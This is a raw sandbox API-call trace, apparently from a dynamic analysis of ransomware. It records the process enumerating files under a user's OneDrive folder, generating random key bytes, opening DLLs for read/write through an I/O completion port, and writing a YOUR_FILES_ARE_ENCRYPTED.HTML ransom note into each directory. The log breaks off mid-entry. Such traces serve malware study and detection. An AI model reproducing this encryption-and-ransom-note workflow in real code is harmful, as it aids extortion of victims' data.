[0114.043] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="DD") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="87") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C0") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="38") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="AB") returned 2 [0114.043] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="2B") returned 2 [0114.043] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="FC") returned 2 [0114.043] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="D4") returned 2 [0114.043] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="7E") returned 2 [0114.043] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="2B") returned 2 [0114.043] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="7F") returned 2 [0114.043] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E0") returned 2 [0114.043] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="79") returned 2 [0114.043] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="42") returned 2 [0114.043] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="77") returned 2 [0114.044] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll" [0114.044] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.044] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0114.044] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x353788c4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x353788c4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x368c78f3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x684c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="wlmfds.dll", cAlternateFileName="")) returned 1 [0114.044] StrStrIW (lpFirst="wlmfds.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll") returned 86 [0114.044] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0114.044] lstrlenW (lpString=".dll") returned 4 [0114.044] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0114.044] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\wlmfds.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0114.046] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=427200) returned 1 [0114.046] GetProcessHeap () returned 0x600000 [0114.046] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0114.049] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="99") returned 2 [0114.049] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="44") returned 2 [0114.049] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B9") returned 2 [0114.049] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="6B") returned 2 [0114.049] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="D9") returned 2 [0114.049] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="6F") returned 2 [0114.049] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="75") returned 2 [0114.049] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="F6") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="47") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C2") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="2F") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="F9") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="C5") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="AF") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C5") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="9E") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="5D") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="43") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="9B") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="48") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="CD") returned 2 [0114.050] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="2C") returned 2 [0114.050] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="81") returned 2 [0114.050] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C2") returned 2 [0114.050] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="14") returned 2 [0114.050] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="61") returned 2 [0114.050] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="37") returned 2 [0114.050] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="CD") returned 2 [0114.050] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F8") returned 2 [0114.050] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="C5") returned 2 [0114.050] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="FB") returned 2 [0114.050] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7C") returned 2 [0114.051] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wlmfds.dll" [0114.051] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.051] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0114.051] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3949b564, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3949b564, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3a77d98f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x5d6c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="WnsClientApi.dll", cAlternateFileName="WNSCLI~1.DLL")) returned 1 [0114.051] StrStrIW (lpFirst="WnsClientApi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.051] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll") returned 92 [0114.051] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0114.051] lstrlenW (lpString=".dll") returned 4 [0114.051] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0114.051] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\wnsclientapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0114.052] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=382656) returned 1 [0114.053] GetProcessHeap () returned 0x600000 [0114.053] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0114.055] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="07") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A4") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="6B") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="25") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="AC") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="59") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="66") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="89") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="49") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="5A") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D8") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="D2") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="57") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A4") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="96") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="16") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="5C") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="29") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EF") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="76") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="DD") returned 2 [0114.055] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="CA") returned 2 [0114.055] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="84") returned 2 [0114.055] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="CE") returned 2 [0114.055] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A6") returned 2 [0114.055] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="2A") returned 2 [0114.055] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="27") returned 2 [0114.055] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="FA") returned 2 [0114.055] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E7") returned 2 [0114.056] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="FE") returned 2 [0114.056] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="0C") returned 2 [0114.056] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2B") returned 2 [0114.056] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll" [0114.056] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.056] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0114.056] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4852f371, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4852f371, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4852f371, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="wo", cAlternateFileName="")) returned 1 [0114.056] StrStrIW (lpFirst="wo", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.056] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo") returned 78 [0114.056] GetProcessHeap () returned 0x600000 [0114.056] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0114.058] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo" [0114.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo\\*" [0114.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4852f371, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4852f371, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4887669e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0114.058] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4852f371, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4852f371, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4887669e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.059] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4887669e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4887669e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x49aa44f0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x144c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.059] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.059] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo\\FileSync.LocalizedResources.dll.mui") returned 114 [0114.059] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.060] lstrlenW (lpString=".mui") returned 4 [0114.060] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.060] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4887669e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4887669e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x49aa44f0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x144c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.060] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0114.060] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0114.060] GetProcessHeap () returned 0x600000 [0114.060] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\wo\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\wo\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.062] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.063] CloseHandle (hObject=0x324) returned 1 [0114.063] GetProcessHeap () returned 0x600000 [0114.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.063] GetProcessHeap () returned 0x600000 [0114.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.063] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b681c64, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4b681c64, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4b681c64, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="xh-za", cAlternateFileName="")) returned 1 [0114.063] StrStrIW (lpFirst="xh-za", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.063] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za") returned 81 [0114.063] GetProcessHeap () returned 0x600000 [0114.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0114.064] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za" [0114.064] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za\\*" [0114.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b681c64, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4b681c64, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4c221446, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.064] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b681c64, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4b681c64, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4c221446, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.064] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c221446, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4c221446, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4fb3372a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.064] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.064] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za\\FileSync.LocalizedResources.dll.mui") returned 117 [0114.065] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.065] lstrlenW (lpString=".mui") returned 4 [0114.065] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.065] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c221446, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4c221446, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4fb3372a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.065] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.065] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0114.065] GetProcessHeap () returned 0x600000 [0114.065] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\xh-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\xh-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.066] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.067] CloseHandle (hObject=0x324) returned 1 [0114.067] GetProcessHeap () returned 0x600000 [0114.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.067] GetProcessHeap () returned 0x600000 [0114.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.067] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50dd3ddb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x50dd3ddb, ftLastAccessTime.dwHighDateTime=0x1d70074, 